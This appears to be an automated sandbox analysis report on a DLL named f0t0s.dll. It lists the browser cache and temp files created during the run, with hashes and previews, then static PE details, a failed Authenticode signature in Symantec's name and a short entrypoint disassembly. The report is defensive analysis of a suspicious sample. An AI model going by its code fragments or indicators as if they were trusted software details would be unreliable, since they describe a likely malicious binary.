Preview:	<html> <head></head> <body> <script type="text/javascript">try{.var cookieSyncConfig = {"datalen":73,"visitor":{"vsCk":"visitor-id","vsDaCk":"data","sepVal":"\|","sepTime":"*","sepCs":"~~","vsDaTime":31536000,"cc":"CH","zone":"d"},"cs":"1","lookup":{"g":{"name":"g","cookie":"data-g","isBl":1,"g":1,"cocs":0},"vzn":{"name":"vzn","cookie":"data-v","isBl":1,"g":0,"cocs":0},"brx":{"name":"brx","cookie":"data-br","isBl":1,"g":0,"cocs":0},"lr":{"name":"lr","cookie":"data-lr","isBl":1,"g":1,"cocs":0}},"hasSameSiteSupport":"0","batch":{"gGroups":["apx","csm","ppt","rbcn","son","bdt","con","opx","tlx","mma","c1x","ys","sov","fb","r1","g","pb","dxu","rkt","trx","wds","crt","ayl","bs","ui","shr","lvr","yld","msn","zem","dmx","pm","som","adb","tdd","soc","adp","vm","spx","nat","ob","adt","got","mf","emx","sy","lr","ttd"],"bSize":2,"time":30000,"ngGroups":[]},"log":{"successLper":10,"failLper":10,"logUrl":{"cl":"https:\/\/hblg.media.net\/log?logid=kfk&evtid=chlog"}},"csloggerUrl":"https:\/\/cslogger.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OR0WKIO1\checksync[2].htm Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	HTML document, ASCII text, with very long lines
Category:	dropped
Size (bytes):	20647
Entropy (8bit):	5.298160305572905
Encrypted:	false
SSDEEP:	384:PF8AGm6ElzD7XzeMk/lg2f5vzBgF3OZOQtQWwY4RXrqt:9SEJDnci2RmF3OsQtQWwY4RXrqt
MD5:	5B2D766D584BA7533F11EDCFD4E41294
SHA1:	27864FF83922B20C28E1A28AA81D3D4CBF08A378
SHA-256:	B8390B7FC30203272A4D556451A29D2B39A3F87AADC939D564E7D8861271A966
SHA-512:	EACEB2DE3057B61E6A62B463306A22334F8B5201C7B3336066B0390A2A426EDDFD0DBC9FFA81CDCE95BCEB18D40D868BAA08E8BECA3A65F36AD623943AA6AA68
Malicious:	false
Preview:	<html> <head></head> <body> <script type="text/javascript">try{.var cookieSyncConfig = {"datalen":73,"visitor":{"vsCk":"visitor-id","vsDaCk":"data","sepVal":"\|","sepTime":"*","sepCs":"~~","vsDaTime":31536000,"cc":"CH","zone":"d"},"cs":"1","lookup":{"g":{"name":"g","cookie":"data-g","isBl":1,"g":1,"cocs":0},"vzn":{"name":"vzn","cookie":"data-v","isBl":1,"g":0,"cocs":0},"brx":{"name":"brx","cookie":"data-br","isBl":1,"g":0,"cocs":0},"lr":{"name":"lr","cookie":"data-lr","isBl":1,"g":1,"cocs":0}},"hasSameSiteSupport":"0","batch":{"gGroups":["apx","csm","ppt","rbcn","son","bdt","con","opx","tlx","mma","c1x","ys","sov","fb","r1","g","pb","dxu","rkt","trx","wds","crt","ayl","bs","ui","shr","lvr","yld","msn","zem","dmx","pm","som","adb","tdd","soc","adp","vm","spx","nat","ob","adt","got","mf","emx","sy","lr","ttd"],"bSize":2,"time":30000,"ngGroups":[]},"log":{"successLper":10,"failLper":10,"logUrl":{"cl":"https:\/\/hblg.media.net\/log?logid=kfk&evtid=chlog"}},"csloggerUrl":"https:\/\/cslogger.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OR0WKIO1\de-ch[1].htm Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	HTML document, UTF-8 Unicode text, with very long lines, with CRLF, LF line terminators
Category:	dropped
Size (bytes):	425682
Entropy (8bit):	5.439402228685438
Encrypted:	false
SSDEEP:	3072:hJ5JUJxx+FstaFdX6/INg50oHoLRscvkp9W3xwp9vlPdXPd/PJiLt:hJ5+OFYRIlEW3xwDlPjPJM
MD5:	F34BA0E02B298E83D38525FF1801FFCB
SHA1:	BB5FAF02377F54C5ED3BEB4220F63D400E9B940F
SHA-256:	1AEA604FADE020F99F90F14D3D472E6E5F4FB476DAE7EEAAFCDFA7B25880F80B
SHA-512:	8C82427F04033AC7EA8E83BE3C83402D185890A1F3782FBD8329F80EE1932733471093B7A067F8DF2CC952F9AEDE2DAA62933D69A3F24DE86D660C63265F717C
Malicious:	false
Preview:	<!DOCTYPE html><html prefix="og: http://ogp.me/ns# fb: http://ogp.me/ns/fb#" lang="de-CH" class="hiperf" dir="ltr" >.. <head data-info="v:20210116_30554380;a:a8b3025b-e9fe-4399-82c9-163c66781b66;cn:1;az:{did:951b20c4cd6d42d29795c846b4755d88, rid: 1, sn: neurope-prod-hp, dt: 2021-01-06T22:57:16.4046816Z, bt: 2021-01-17T01:15:50.5620070Z};ddpi:1;dpio:;dpi:1;dg:tmx.pc.ms.ie10plus;th:start;PageName:startPage;m:de-ch;cb:;l:de-ch;mu:de-ch;ud:{cid:,vk:homepage,n:,l:de-ch,ck:};xd:BBqgbZW;ovc:f;al:;fxd:f;xdpub:2021-01-12 22:59:27Z;xdmap:2021-01-21 07:12:37Z;axd:;f:msnallexpusers,muidflt28cf,muidflt29cf,muidflt46cf,muidflt51cf,muidflt53cf,muidflt259cf,muidflt299cf,pnehp2cf,platagyhp1cf,moneyhp1cf,moneyhp2cf,starthz1cf,audexhz3cf,onetrustpoplive,1s-bing-news,vebudumu04302020,bbh20200521msn,strsl-spar-noc;userOptOut:false;userOptOutOptions:" data-js="{"dpi":1.0,"ddpi":1.0,"dpio":null,"forcedpi":null,"dms":6000,"ps":1000,"bds&

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OR0WKIO1\httpErrorPagesScripts[1] Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	UTF-8 Unicode (with BOM) text, with CRLF line terminators
Category:	downloaded
Size (bytes):	12105
Entropy (8bit):	5.451485481468043
Encrypted:	false
SSDEEP:	192:x20iniOciwd1BtvjrG8tAGGGVWnvyJVUrUiki3ayimi5ezLCvJG1gwm3z:xPini/i+1Btvjy815ZVUwiki3ayimi5f
MD5:	9234071287E637F85D721463C488704C
SHA1:	CCA09B1E0FBA38BA29D3972ED8DCECEFDEF8C152
SHA-256:	65CC039890C7CEB927CE40F6F199D74E49B8058C3F8A6E22E8F916AD90EA8649
SHA-512:	87D691987E7A2F69AD8605F35F94241AB7E68AD4F55AD384F1F0D40DC59FFD1432C758123661EE39443D624C881B01DCD228A67AFB8700FE5E66FC794A6C0384
Malicious:	false
IE Cache URL:	res://ieframe.dll/httpErrorPagesScripts.js
Preview:	...function isExternalUrlSafeForNavigation(urlStr)..{..var regEx = new RegExp("^(http(s?)\|ftp\|file)://", "i");..return regEx.exec(urlStr);..}..function clickRefresh()..{..var location = window.location.href;..var poundIndex = location.indexOf('#');..if (poundIndex != -1 && poundIndex+1 < location.length && isExternalUrlSafeForNavigation(location.substring(poundIndex+1)))..{..window.location.replace(location.substring(poundIndex+1));..}..}..function navCancelInit()..{..var location = window.location.href;..var poundIndex = location.indexOf('#');..if (poundIndex != -1 && poundIndex+1 < location.length && isExternalUrlSafeForNavigation(location.substring(poundIndex+1)))..{..var bElement = document.createElement("A");..bElement.innerText = L_REFRESH_TEXT;..bElement.href = 'javascript:clickRefresh()';..navCancelContainer.appendChild(bElement);..}..else..{..var textNode = document.createTextNode(L_RELOAD_TEXT);..navCancelContainer.appendChild(textNode);..}..}..function getDisplayValue(elem

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OR0WKIO1\http___cdn.taboola.com_libtrc_static_thumbnails_1328c3fff2a2eeaee34a27ffef64effd[1].jpg Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 207x311, frames 3
Category:	downloaded
Size (bytes):	8796
Entropy (8bit):	7.932758828158679
Encrypted:	false
SSDEEP:	192:5Vk0K0JQFQkpKwr74coxJmjegkLjJylALjKZeF7u:5iKMpKwr7LkJmKgkL9yKLjKX
MD5:	A5C14A92AE6FBEAC55AF0DBF2B6F8897
SHA1:	C57AA9965B038472448C56B5F483172778C1FBBA
SHA-256:	A1459BF75C9E041186F063AFDF7B4B62392AEDB9C83BFDB40EFB32AAC416B53B
SHA-512:	9833415341BC8DEA009DCA6016F56DA898ADCD8DDEF3F94BF9A7D7BB719C0682A65A2BA076C0A99CA6BDB10545EA95D453CB127AA5629E7586CFB921DA0237EC
Malicious:	false
IE Cache URL:	https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:auto%2Ce_sharpen/http%3A%2F%2Fcdn.taboola.com%2Flibtrc%2Fstatic%2Fthumbnails%2F1328c3fff2a2eeaee34a27ffef64effd.jpg
Preview:	......JFIF.....................................................................&""&0-0>>T.......................................................&""&0-0>>T......7...."..........5...................................................................................'.@...............(..F..$..................t-c..$..@................&.s.....[...}...........}.....h.9..../.i~T=u.h.R...~A..}................ts.b,......b....(j..r.3"..Z6.."..+...f!..........0.52sF......"O..2...e.3c7X....Yhj>T..P.@.Kyc.n_o4u....:..V.(.E-&nx.....mz.j!.p.XG....h]..\z.k../..\.G1....uK+H.J,_e.I[..f...U.zb..e8.&.1D.zF.{.....Mv....d\.vyw.N zxjp....R..5K.u.....t.....4..l.:....p.t..m.E.n.z.Y..z...\c.K.....^....xg[re.IS ..2/.d...F+.<$}........Qk...-{h..=)r.8.;..Y.~.s...".B....R...r...ZY...'.t....q..t.c...t...}t).B.q.....1.\..O+.."Y.....Q%S-........H.1.].d.b.Kg......3..G..b.}y.qw.]..G.o...X..;.hJ..h.;....q.....I.e.).\|....<.....S.CH./.k.........3nSDr..Y.h..Z.....+..s.r.&Z

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OR0WKIO1\https___console.brax-cdn.com_creatives_b9476698-227d-4478-b354-042472d9181c_TB1759-founders_box_hg_2_1000x600_1000x600_74795f6956a5ddedf65bfd018b867316[1].jpg Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 207x311, frames 3
Category:	downloaded
Size (bytes):	11335
Entropy (8bit):	7.9685707877326335
Encrypted:	false
SSDEEP:	192:/8x0sts3XLbZPuofQcyChWZ+3NTqWsS6YD3Up4FoVILxlh1p9OaVhH59zoJCqt6O:/8x0st+XRuofryp+xCvp8lvp9Oih3qtT
MD5:	0981FBE5D321E249446F833F93379C87
SHA1:	978E0EE3ADD3B712ACEBF0805D2B9E5FBF02FC10
SHA-256:	9C4CD7313BFBEB0F33DF65DAC38C670DF471477447FB70779D625CAE70748A5C
SHA-512:	C66A77833D81D6FD014844F382AC5FD6DB5AF5BA08CA54B79448367FB125D2A9CE4F6309FAFE398DAB40F9C426D4519ABFCF51EBE858A38851E9896CB8292E46
Malicious:	false
IE Cache URL:	https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:auto%2Ce_sharpen/https%3A%2F%2Fconsole.brax-cdn.com%2Fcreatives%2Fb9476698-227d-4478-b354-042472d9181c%2FTB1759-founders_box_hg_2_1000x600_1000x600_74795f6956a5ddedf65bfd018b867316.png
Preview:	......JFIF..........................................."......".$...$.6&&6>424>LDDL_Z_\|\|.............................."......".$...$.6&&6>424>LDDL_Z_\|\|.......7...."..........4.................................................................8._......$.J..../. ..=!A..b8P...z.i..idKK......C...r.\.[.[ZO.[B7^.-z.........1..z.....f...j.....9NE.R...s}.Z...<..ZU..../...mO.E.}{.5..xC.A......A....\|.#.^..F:Q..i.=..+....v.....9."rb&m..L..BhEG.@..{. E........v.....PzKCE.kEZw9....O.f....n'.~.N`.G.......48h.=Ys..c.g..4..]..7m..1.v.=,.2A,.b....g8.....?YO...V8...F.QC..&.z.i...s.'Sj..'/.=..).M..gL..0.6.}G\..0...-._h..c&.L.).^7....Spu..D..V..BW..]...r}[...&.F.7.].G.......+fu."n!.....71hZN].\.S.....g....l...,K.uZ...o>.......o..V...3.?v...[.`R.g....%..W?......e...A...F.j\|...9..]......+N..9.....jNz....~...43'...$.....U_....vd..)/_.\|...z....E..4..GK...S9#....rR..{.=...8..5.\...T.X5T.`.....].......{.z=....SG.6....3~.SNZ.I.o...f.\|h`.!1.....E9D?9s.&..!.%..4.3..Q`....I.t...(..

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OR0WKIO1\jquery-2.1.1.min[1].js Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	ASCII text, with very long lines, with CRLF line terminators
Category:	downloaded
Size (bytes):	84249
Entropy (8bit):	5.369991369254365
Encrypted:	false
SSDEEP:	1536:DPEkjP+iADIOr/NEe876nmBu3HvF38NdTuJO1z6/A4TqAub0R4ULvguEhjzXpa9r:oNM2Jiz6oAFKP5a98HrY
MD5:	9A094379D98C6458D480AD5A51C4AA27
SHA1:	3FE9D8ACAAEC99FC8A3F0E90ED66D5057DA2DE4E
SHA-256:	B2CE8462D173FC92B60F98701F45443710E423AF1B11525A762008FF2C1A0204
SHA-512:	4BBB1CCB1C9712ACE14220D79A16CAD01B56A4175A0DD837A90CA4D6EC262EBF0FC20E6FA1E19DB593F3D593DDD90CFDFFE492EF17A356A1756F27F90376B650
Malicious:	false
IE Cache URL:	https://static-global-s-msn-com.akamaized.net/hp-neu/_h/975a7d20/webcore/externalscripts/jquery/jquery-2.1.1.min.js
Preview:	/! jQuery v2.1.1 \| (c) 2005, 2014 jQuery Foundation, Inc. \| jquery.org/license /..!function(a,b){"object"==typeof module&&"object"==typeof module.exports?module.exports=a.document?b(a,!0):function(a){if(!a.document)throw new Error("jQuery requires a window with a document");return b(a)}:b(a)}("undefined"!=typeof window?window:this,function(a,b){var c=[],d=c.slice,e=c.concat,f=c.push,g=c.indexOf,h={},i=h.toString,j=h.hasOwnProperty,k={},l=a.document,m="2.1.1",n=function(a,b){return new n.fn.init(a,b)},o=/^[\s\uFEFF\xA0]+\|[\s\uFEFF\xA0]+$/g,p=/^-ms-/,q=/-([\da-z])/gi,r=function(a,b){return b.toUpperCase()};n.fn=n.prototype={jquery:m,constructor:n,selector:"",length:0,toArray:function(){return d.call(this)},get:function(a){return null!=a?0>a?this[a+this.length]:this[a]:d.call(this)},pushStack:function(a){var b=n.merge(this.constructor(),a);return b.prevObject=this,b.context=this.context,b},each:function(a,b){return n.each(this,a,b)},map:function(a){return this.pushStack(n.map(this,funct

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OR0WKIO1\otBannerSdk[1].js Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	ASCII text, with very long lines, with CRLF line terminators
Category:	downloaded
Size (bytes):	372457
Entropy (8bit):	5.219562494722367
Encrypted:	false
SSDEEP:	6144:B0C8zZ5OVNeBNWabo7QtD+nKmbHgtTVfwBSh:B4zj7BNWaRfh
MD5:	DA186E696CD78BC57C0854179AE8704A
SHA1:	03FCF360CC8D29A6D63BE8073D0E52FFC2BDDB21
SHA-256:	F10DC8CE932F150F2DB28639CF9119144AE979F8209E0AC37BB98D30F6FB718F
SHA-512:	4DE19D4040E28177FD995D56993FFACB9A2A0A7AAB8265BD1BBC7400C565BC73CD61B916D23228496515C237EEA14CCC46839F507879F67BA510D97F46B63557
Malicious:	false
IE Cache URL:	https://www.msn.com/_h/511e4956/webcore/externalscripts/oneTrustV2/scripttemplates/6.4.0/otBannerSdk.js
Preview:	/** .. * onetrust-banner-sdk.. * v6.7.0.. * by OneTrust LLC.. * Copyright 2020 .. */..!function () { "use strict"; var o = function (e, t) { return (o = Object.setPrototypeOf \|\| { __proto__: [] } instanceof Array && function (e, t) { e.__proto__ = t } \|\| function (e, t) { for (var o in t) t.hasOwnProperty(o) && (e[o] = t[o]) })(e, t) }; var r = function () { return (r = Object.assign \|\| function (e) { for (var t, o = 1, n = arguments.length; o < n; o++)for (var r in t = arguments[o]) Object.prototype.hasOwnProperty.call(t, r) && (e[r] = t[r]); return e }).apply(this, arguments) }; function l(s, i, a, l) { return new (a = a \|\| Promise)(function (e, t) { function o(e) { try { r(l.next(e)) } catch (e) { t(e) } } function n(e) { try { r(l.throw(e)) } catch (e) { t(e) } } function r(t) { t.done ? e(t.value) : new a(function (e) { e(t.value) }).then(o, n) } r((l = l.apply(s, i \|\| [])).next()) }) } function k(o, n) { var r, s, i, e, a = { label: 0, sent: function () { if (1 & i[0]) throw i[1]

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OR0WKIO1\otFlat[1].json Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	ASCII text, with very long lines, with CRLF line terminators
Category:	downloaded
Size (bytes):	12588
Entropy (8bit):	5.376121346695897
Encrypted:	false
SSDEEP:	192:RtmLMzybpgtNs5YdGgDaRBYw6Q3gRUJ+q5iwJlLd+JmMqEb5mfPPenUpoQuQJ/Qq:RgI14jbK3e85csXf+oH6iAHyP1MJAk
MD5:	AF6480CC2AD894E536028F3FDB3633D7
SHA1:	EA42290413E2E9E0B2647284C4BC03742C9F9048
SHA-256:	CA4F7CE0B724E12425B84184E4F5B554F10F642EE7C4BE4D58468D8DED312183
SHA-512:	A970B401FE569BF10288E1BCDAA1AF163E827258ED0D7C60E25E2D095C6A5363ECAE37505316CF22716D02C180CB13995FA808000A5BD462252F872197F4CE9B
Malicious:	false
IE Cache URL:	https://www.msn.com/_h/511e4956/webcore/externalscripts/oneTrustV2/scripttemplates/6.4.0/assets/otFlat.json
Preview:	.. {.. "name": "otFlat",.. "html": "PGRpdiBpZD0ib25ldHJ1c3QtYmFubmVyLXNkayIgY2xhc3M9Im90RmxhdCI+PGRpdiBjbGFzcz0ib3Qtc2RrLWNvbnRhaW5lciI+PGRpdiBjbGFzcz0ib3Qtc2RrLXJvdyI+PGRpdiBpZD0ib25ldHJ1c3QtZ3JvdXAtY29udGFpbmVyIiBjbGFzcz0ib3Qtc2RrLWVpZ2h0IG90LXNkay1jb2x1bW5zIj48ZGl2IGNsYXNzPSJiYW5uZXJfbG9nbyI+PC9kaXY+PGRpdiBpZD0ib25ldHJ1c3QtcG9saWN5Ij48aDMgaWQ9Im9uZXRydXN0LXBvbGljeS10aXRsZSI+VGhpcyBzaXRlIHVzZXMgY29va2llczwvaDM+PCEtLSBNb2JpbGUgQ2xvc2UgQnV0dG9uIC0tPjxkaXYgaWQ9Im9uZXRydXN0LWNsb3NlLWJ0bi1jb250YWluZXItbW9iaWxlIiBjbGFzcz0ib3QtaGlkZS1sYXJnZSI+PGJ1dHRvbiBjbGFzcz0ib25ldHJ1c3QtY2xvc2UtYnRuLWhhbmRsZXIgb25ldHJ1c3QtY2xvc2UtYnRuLXVpIGJhbm5lci1jbG9zZS1idXR0b24gb3QtbW9iaWxlIG90LWNsb3NlLWljb24iIGFyaWEtbGFiZWw9IkNsb3NlIEJhbm5lciIgdGFiaW5kZXg9IjAiPjwvYnV0dG9uPjwvZGl2PjwhLS0gTW9iaWxlIENsb3NlIEJ1dHRvbiBFTkQtLT48cCBpZD0ib25ldHJ1c3QtcG9saWN5LXRleHQiPldlIHVzZSBjb29raWVzIHRvIGltcHJvdmUgeW91ciBleHBlcmllbmNlLCB0byByZW1lbWJlciBsb2ctaW4gZGV0YWlscywgcHJvdmlkZSBzZWN1cmUgbG9

C:\Users\user\AppData\Local\Temp\~DF44580B79E43B30BA.TMP Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	data
Category:	dropped
Size (bytes):	39697
Entropy (8bit):	0.5792564187870629
Encrypted:	false
SSDEEP:	96:kBqoxKAuvScS+xvdc/Vv1oQ+3xv1oQ+3dv1oQ+3i:kBqoxKAuqR+xvdc/VW3xW3dW3i
MD5:	D4B548A5B2717AA36A2F31D00C5CF627
SHA1:	A89962E8339A37C0F804C8AC9E44A62D60262F4B
SHA-256:	6FD5B04F0E1F3A6F7FCF683A6661A689F3E8135B21A6FE29C8D29FE06016DC9B
SHA-512:	8F302218179795537A2FDDB45A1A700677B4FE91DFEB4E2D96529417C25AD22D299119DF1C30EC1D34A7E66BA4CF27ABBA98D311184AD19E40F2EEA5A5D559FB
Malicious:	false
Preview:	.............................%..H..M..{y..+.0...(................... ...............................................%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\~DF97D335606DF062D5.TMP Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	data
Category:	dropped
Size (bytes):	13557
Entropy (8bit):	0.770536336978652
Encrypted:	false
SSDEEP:	24:c9lLh9lLh9lIn9lIn9loA9loQ9lWmBukrgBaPhnBqpOkUKB6:kBqoI7dmukrgBaPhnBqpOkRB6
MD5:	0234DB6A5F1DAA6773C39E0FC169D6F4
SHA1:	4BD946A838BBE67042FC8FFEE6988D95CAA0A50B
SHA-256:	CE6E5BBE46A861936D37A3A13AD86E46703F22127208BE595557FCF9ADA144B1
SHA-512:	6D3F61B2B141C6FFCD6AE4115988A599AE2213AFF360211DE1ED1B821A3E8F3EEE1C272D37C14D5A5A23D5B27635304EF38A928A6FFF94D30039E6CED1349527
Malicious:	false
Preview:	.............................%..H..M..{y..+.0...(................... ...............................................%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\~DFC3F97ABCC3DE5282.TMP Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	data
Category:	dropped
Size (bytes):	187926
Entropy (8bit):	3.13217603122955
Encrypted:	false
SSDEEP:	3072:mZ/2BfcYmu5kLTzGtxZ/2Bfc/mu5kLTzGt:fA
MD5:	DCD41ABA2508D5CA287ED46F18311FC8
SHA1:	D299555DB10AF6761B9C12B63A36585BC89AE983
SHA-256:	8DFB818598BFBA2BC20C2948AD3F48F4EDDE3926644548BABBF03EF968158419
SHA-512:	91C867E74BA48E003D15BB7E85C8E1A96FC752BB4904A632FA46912A4FC003EABC4A2F951E9E61C2A171C294BCA5932578A5F67E7D7D64F70EFFEB415E437304
Malicious:	false
Preview:	.............................%..H..M..{y..+.0...(................... ...............................................%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\~DFE48F22F871CCC426.TMP Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	data
Category:	dropped
Size (bytes):	29989
Entropy (8bit):	0.3303862347843544
Encrypted:	false
SSDEEP:	24:c9lLh9lLh9lIn9lIn9lRg9lRA9lTS9lTy9lSSd9lSSd9lwg9lwQ9l2G/9l2O9lah:kBqoxKAuvScS+DdG+Diy
MD5:	D7A34355210893382E081138A1DFD3AF
SHA1:	C839CAB3DD3E2D81EB7152BD1A421DE664AE4692
SHA-256:	962AB5ECB28C909542FEBCA52E42FF46432B45CE42539F7B5F4FBA2E48B15C3F
SHA-512:	F0A302186C802C4554A20DFEB8B1241DEB6927F7057A78947D65170D69EB3216D510D95F1320B564A4BB5B5B26CAEDCCA1879AA3AE5899F6C72A6234608B75D8
Malicious:	false
Preview:	.............................%..H..M..{y..+.0...(................... ...............................................%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\YJNWZLLLXQC544CHWZ3W.temp Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	data
Category:	modified
Size (bytes):	5149
Entropy (8bit):	3.188753930693946
Encrypted:	false
SSDEEP:	48:X90dilPGIxC9GrIoAAsASFWi00dilPGIxh683GrIoAAczTi00dilPGIxx9GrIoA8:X7PGr9SgAJtimPGI3SgAkimPG89SgAf
MD5:	E08B29613B428E3C9692DA3DC95C68D7
SHA1:	07D6F72B5266600E0F6727C2630960DF32F15160
SHA-256:	A02CF79A351D3FD014E93C91A79DC6A61607E3C2CFB811E970B206162DB36379
SHA-512:	6E34FA9A8ECB4D94CC6B6BCAB0D6B931331333326B9E61FB908B1AEAC27DACF11E3D1C6481EC6248F365D395D309249208694B700837900630A577C8BDA6684E
Malicious:	false
Preview:	...................................FL..................F.@.. .....@.>.............?.c................................P.O. .:i.....+00.../C:\.....................1.....>Q.<..PROGRA~1..t......L.>Q.<....E...............J.....\|..P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....l.1......L.J..INTERN~1..T......L.5R.9..............................i.n.t.e.r.n.e.t. .e.x.p.l.o.r.e.r.....f.2......L.9 .iexplore.exe..J......L.J5R.9.....R..........x.............i.e.x.p.l.o.r.e...e.x.e.......^...............-.......]...........kn.......C:\Program Files\internet explorer\iexplore.exe....-.p.r.i.v.a.t.e...C.:.\.W.i.n.d.o.w.s.\.S.Y.S.T.E.M.3.2.\.I.E.F.R.A.M.E...d.l.l.........%SystemRoot%\SYSTEM32\IEFRAME.dll...................................................................................................................................................................................................................................%.S.y.s.t.e.m.R.o.o.t.%.\.S.Y.S.T.E.M.3.2.\.I

Static File Info

General
File type:	MS-DOS executable, MZ for MS-DOS
Entropy (8bit):	6.3911803226544635
TrID:	Win32 Dynamic Link Library (generic) (1002004/3) 99.60% Generic Win/DOS Executable (2004/3) 0.20% DOS Executable Generic (2002/1) 0.20% VXD Driver (31/22) 0.00% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	f0t0s.dll
File size:	145264
MD5:	eecfc005c040236b5818d7e8f775ffed
SHA1:	42bb1cfe2532023f6a099328e7a8f08dcd145231
SHA256:	cd773a8e18731c4d551faf1dcc8eb050c7eac19c9758a145f91c1dfa79361db8
SHA512:	ad9e6f52e5e2920369a003c98539c212e9ce839ff211cf3059468ba565fce345277611b893e8c2f546108cb9cd921c20c32ec8da5ce78de298b738f7b2221cf1
SSDEEP:	3072:SgcFjsVu25PUivUZ8qsgUGZ5qyGIf6HJu4H51eVdyUhsQX3fHk:6GzvG8qXHnf6kSeV4UhPc
File Content Preview:	MZ......................................................................!..L.!This -7Afram cannot be run in DOS mode....$.......PE..L..................!.................~............@.................................3=..................................\..

File Icon


Icon Hash:	74f0e4ecccdce0e4

Static PE Info

General
Entrypoint:	0x407ea0
Entrypoint Section:	.text
Digitally signed:	true
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
DLL Characteristics:
Time Stamp:	0x0 [Thu Jan 1 00:00:00 1970 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f972e6da920ff59e6ea59b59811f1c1c

Authenticode Signature

Signature Valid:	false
Signature Issuer:	CN=VeriSign Class 3 Code Signing 2004 CA, OU=Terms of use at https://www.verisign.com/rpa (c)04, OU=VeriSign Trust Network, O="VeriSign, Inc.", C=US
Signature Validation Error:	The digital signature of the object did not verify
Error Number:	-2146869232
Not Before, Not After	10/31/2007 1:00:00 AM 11/25/2010 12:59:59 AM
Subject Chain	CN=Symantec Corporation, OU=Symantec Research Labs, OU=Digital ID Class 3 - Microsoft Software Validation v2, O=Symantec Corporation, L=Santa Monica, S=California, C=US
Version:	3
Thumbprint MD5:	773A103A1953B292916AAA8D3382140B
Thumbprint SHA-1:	508E846523E1B131438B220694BE91793886508E
Thumbprint SHA-256:	F67DDA8679C10547D47FBC3BD71D98953D4F73FC60C50035E6F366E3DA6395C2
Serial:	758F5EE8263B6694719D8434EB998608

Entrypoint Preview

Instruction
push ebp
mov ebp, esp
sub esp, 48h
push esi
push 00000000h
call dword ptr [0040ACC4h]
mov dword ptr [ebp-18h], eax
push 00000053h
push dword ptr [00420FB4h]
push eax
push 0000006Ch
call 00007FC34CA95937h
add esp, 10h
lea ecx, dword ptr [00420F98h]
add ecx, 2Bh
sub ecx, BFC62B6Bh
mov dword ptr [00420F8Ch], ecx
push 0041EF0Ch
push 00420FA8h
push 00000001h
push 0000004Dh
call dword ptr [0040AF30h]
mov dword ptr [ebp-28h], eax
push 0000001Ah
push dword ptr [00420F8Ch]
push eax
push dword ptr [00420FACh]
push 00000026h
push 00000015h
push dword ptr [00420F98h]
call 00007FC34CA9B272h
mov dword ptr [ebp-0Ch], eax
lea esi, dword ptr [00420F98h]
sub esi, 13h
xor esi, esi
sub esi, DA2E24E8h
add esi, esi
jmp 00007FC34CA98412h
add esi, edi
push 0041F0B4h
push 0040A504h
call dword ptr [0040AC60h]
mov byte ptr [ecx+14h], al
int3
mov edi, esi
add edx, esi
ret
mov ecx, dword ptr [esp+60h]
mov dword ptr [0040D0C8h], eax
and eax, edx
int3
push eax
push 00000000h
push 00000000h
call dword ptr [0040AC4Ch]
jne 00007FC34CA96C24h
xor ecx, ebx
add eax, 009D6122h

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x9fe6	0x45c	.text
IMAGE_DIRECTORY_ENTRY_IMPORT	0x1ec98	0x12c	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x0	0x0
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x22200	0x1570	.text
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x27000	0x1180	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
